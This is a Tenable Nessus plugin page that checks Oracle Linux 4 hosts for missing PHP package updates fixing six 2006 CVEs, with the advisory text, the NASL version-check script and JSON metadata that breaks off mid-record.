Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)
2013-07-12T00:00:00
ID ORACLELINUX_ELSA-2006-0730.NASL Type nessus Reporter Tenable Modified 2018-08-13T00:00:00
Description
Updated PHP packages that fix a security issue are now available.
This update has been rated as having important security impact by the Red Hat Security Response Team.
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.
Users of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption.
From Red Hat Security Advisory 2006:0730 :
The Hardened-PHP Project discovered an overflow in the PHP htmlentities() and htmlspecialchars() routines. If a PHP script used the vulnerable functions to parse UTF-8 data, a remote attacker sending a carefully crafted request could trigger the overflow and potentially execute arbitrary code as the 'apache' user.
(CVE-2006-5465)
From Red Hat Security Advisory 2006:0669 :
A response-splitting issue was discovered in the PHP session handling.
If a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)
A buffer overflow was discovered in the PHP sscanf() function. If a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user. (CVE-2006-4020)
An integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)
A buffer overflow was discovered in the PHP gd extension. If a script was set up to process GIF images from untrusted sources using the gd extension, a remote attacker could cause a heap overflow.
(CVE-2006-4484)
An integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Oracle Linux Security Advisories ELSA-2006-0730 /
# ELSA-2006-0669.
#
include("compat.inc");
if (description)
{
script_id(67421);
script_version("1.3");
script_cvs_date("Date: 2018/08/13 14:32:36");
script_cve_id("CVE-2006-3016", "CVE-2006-4020", "CVE-2006-4482", "CVE-2006-4484", "CVE-2006-4486", "CVE-2006-5465");
script_xref(name:"RHSA", value:"2006:0669");
script_xref(name:"RHSA", value:"2006:0730");
script_name(english:"Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Oracle Linux host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"Updated PHP packages that fix a security issue are now available.
This update has been rated as having important security impact by the
Red Hat Security Response Team.
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Web server.
Users of PHP should upgrade to these updated packages which contain
backported patches to correct these issues. These packages also contain
a fix for a bug where certain input strings to the metaphone() function
could cause memory corruption.
From Red Hat Security Advisory 2006:0730 :
The Hardened-PHP Project discovered an overflow in the PHP
htmlentities() and htmlspecialchars() routines. If a PHP script used
the vulnerable functions to parse UTF-8 data, a remote attacker
sending a carefully crafted request could trigger the overflow and
potentially execute arbitrary code as the 'apache' user.
(CVE-2006-5465)
From Red Hat Security Advisory 2006:0669 :
A response-splitting issue was discovered in the PHP session handling.
If a remote attacker can force a carefully crafted session identifier
to be used, a cross-site-scripting or response-splitting attack could
be possible. (CVE-2006-3016)
A buffer overflow was discovered in the PHP sscanf() function. If a
script used the sscanf() function with positional arguments in the
format string, a remote attacker sending a carefully crafted request
could execute arbitrary code as the 'apache' user. (CVE-2006-4020)
An integer overflow was discovered in the PHP wordwrap() and
str_repeat() functions. If a script running on a 64-bit server used
either of these functions on untrusted user data, a remote attacker
sending a carefully crafted request might be able to cause a heap
overflow. (CVE-2006-4482)
A buffer overflow was discovered in the PHP gd extension. If a script
was set up to process GIF images from untrusted sources using the gd
extension, a remote attacker could cause a heap overflow.
(CVE-2006-4484)
An integer overflow was discovered in the PHP memory allocation
handling. On 64-bit platforms, the 'memory_limit' setting was not
enforced correctly, which could allow a denial of service attack by a
remote user. (CVE-2006-4486)"
);
script_set_attribute(
attribute:"see_also",
value:"https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html"
);
script_set_attribute(attribute:"solution", value:"Update the affected php packages.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_cwe_id(119);
script_set_attribute(attribute:"patch_publication_date", value:"2006/11/30");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/12");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-domxml");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-gd");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-imap");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-ldap");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-mbstring");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-mysql");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-ncurses");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-odbc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-pear");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-pgsql");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-snmp");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:php-xmlrpc");
script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:4");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/01");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
script_family(english:"Oracle Linux Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && "ia64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);
flag = 0;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-devel-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-devel-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-domxml-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-domxml-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-gd-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-gd-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-imap-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-imap-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-ldap-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-ldap-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-mbstring-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-mbstring-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-mysql-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-mysql-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-ncurses-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-ncurses-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-odbc-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-odbc-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-pear-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-pear-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-pgsql-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-pgsql-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-snmp-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-snmp-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"i386", reference:"php-xmlrpc-4.3.9-3.22")) flag++;
if (rpm_check(release:"EL4", cpu:"x86_64", reference:"php-xmlrpc-4.3.9-3.22")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "ORACLELINUX_ELSA-2006-0730.NASL", "bulletinFamily": "scanner", "title": "Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)", "description": "Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the Red Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities() and htmlspecialchars() routines. If a PHP script used the vulnerable functions to parse UTF-8 data, a remote attacker sending a carefully crafted request could trigger the overflow and potentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script was set up to process GIF images from untrusted sources using the gd extension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)", "published": "2013-07-12T00:00:00", "modified": "2018-08-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=67421", "reporter": "Tenable", "references": ["https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html"], "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482", "CVE-2006-5465"], "type": "nessus", "lastseen": "2018-09-02T00:00:54", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-domxml", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-imap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-ncurses", "p-cpe:/a:oracle:linux:php-snmp", "p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-mysql", "p-cpe:/a:oracle:linux:php-xmlrpc", "p-cpe:/a:oracle:linux:php-pear", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-pgsql"], "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482", "CVE-2006-5465"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the Red Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities() and htmlspecialchars() routines. If a PHP script used the vulnerable functions to parse UTF-8 data, a remote attacker sending a carefully crafted request could trigger the overflow and potentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script was set up to process GIF images from untrusted sources using the gd extension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "0597f2c1d894d2ac075ba5efd35085ff4a32293dae1ba87d9f7bae2b5adb8610", "hashmap": [{"hash": "5e129de1471424c1b785db5398b6e034", "key": "sourceData"}, {"hash": "a3df1211c7b4f8002f729fdec6b65ba4", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c52c842077cf089d22f0664713131fe8", "key": "references"}, {"hash": "296976f54ebc7ab6844139efdf1ee500", "key": "title"}, {"hash": "b2bcd21dea5c25f09b234688651791fd", "key": "description"}, {"hash": "c5b9315a071dc031333e754a6c18b197", "key": "href"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "afe48c3fc64f3dcf0944ff6536c43c36", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "ca3712ddee1ac1e48e7d8a157ac26179", "key": "pluginID"}, {"hash": "1865261413c3db59730e6f4c15d45b87", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=67421", "id": "ORACLELINUX_ELSA-2006-0730.NASL", "lastseen": "2018-08-30T19:52:14", "modified": "2018-08-13T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "67421", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisories ELSA-2006-0730 / \n# ELSA-2006-0669.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67421);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/08/13 14:32:36\");\n\n script_cve_id(\"CVE-2006-3016\", \"CVE-2006-4020\", \"CVE-2006-4482\", \"CVE-2006-4484\", \"CVE-2006-4486\", \"CVE-2006-5465\");\n script_xref(name:\"RHSA\", value:\"2006:0669\");\n script_xref(name:\"RHSA\", value:\"2006:0730\");\n\n script_name(english:\"Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues. These packages also contain\na fix for a bug where certain input strings to the metaphone() function\ncould cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP\nhtmlentities() and htmlspecialchars() routines. If a PHP script used\nthe vulnerable functions to parse UTF-8 data, a remote attacker\nsending a carefully crafted request could trigger the overflow and\npotentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier\nto be used, a cross-site-scripting or response-splitting attack could\nbe possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a\nscript used the sscanf() function with positional arguments in the\nformat string, a remote attacker sending a carefully crafted request\ncould execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and\nstr_repeat() functions. If a script running on a 64-bit server used\neither of these functions on untrusted user data, a remote attacker\nsending a carefully crafted request might be able to cause a heap\noverflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script\nwas set up to process GIF images from untrusted sources using the gd\nextension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation\nhandling. On 64-bit platforms, the 'memory_limit' setting was not\nenforced correctly, which could allow a denial of service attack by a\nremote user. (CVE-2006-4486)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000016.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n\n", "title": "Oracle Linux 4 : php (ELSA-2006-0730 / ELSA-2006-0669)", "type": "nessus", "viewCount": 5}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:52:14"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-domxml", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-imap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-ncurses", "p-cpe:/a:oracle:linux:php-snmp", "p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-mysql", "p-cpe:/a:oracle:linux:php-xmlrpc", "p-cpe:/a:oracle:linux:php-pear", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-pgsql"], "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482", "CVE-2006-5465"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix a security issue are now available. \n\nThis update has been rated as having important security impact by the Red Hat Security Response Team. \n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. \n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption. \n\n\nFrom Red Hat Security Advisory 2006:0730 :\n\nThe Hardened-PHP Project discovered an overflow in the PHP htmlentities() and htmlspecialchars() routines. If a PHP script used the vulnerable functions to parse UTF-8 data, a remote attacker sending a carefully crafted request could trigger the overflow and potentially execute arbitrary code as the 'apache' user.\n(CVE-2006-5465)\n\n\nFrom Red Hat Security Advisory 2006:0669 :\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script was set up to process GIF images from untrusted sources using the gd extension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ee2db27c8339d58b27f5239000a3afdf8e02c9dcfae006be9cd3d350c680d27d", "hashmap": [{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "a3df1211c7b4f8002f729fdec6b65ba4", "key": "cpe"}, {"hash": "fc3d18965a454940fdb8027d567959ee", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c52c842077cf089d22f0664713131fe8", "key": "references"}, {"hash": "296976f54ebc7ab6844139efdf1ee500", "key": "title"}, {"hash": "b2bcd21dea5c25f09b234688651791fd", "key": "description"}, {"hash": "c5b9315a071dc031333e754a6c18b197", "key": "href"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "afe48c3fc64f3dcf0944ff6536c43c36", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "ca3712ddee1ac1e48e7d8a157ac26179", "key": "pluginID"}, {"hash": "8e47d4082bf7f506143b52c07e08b700", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=67421", "id": 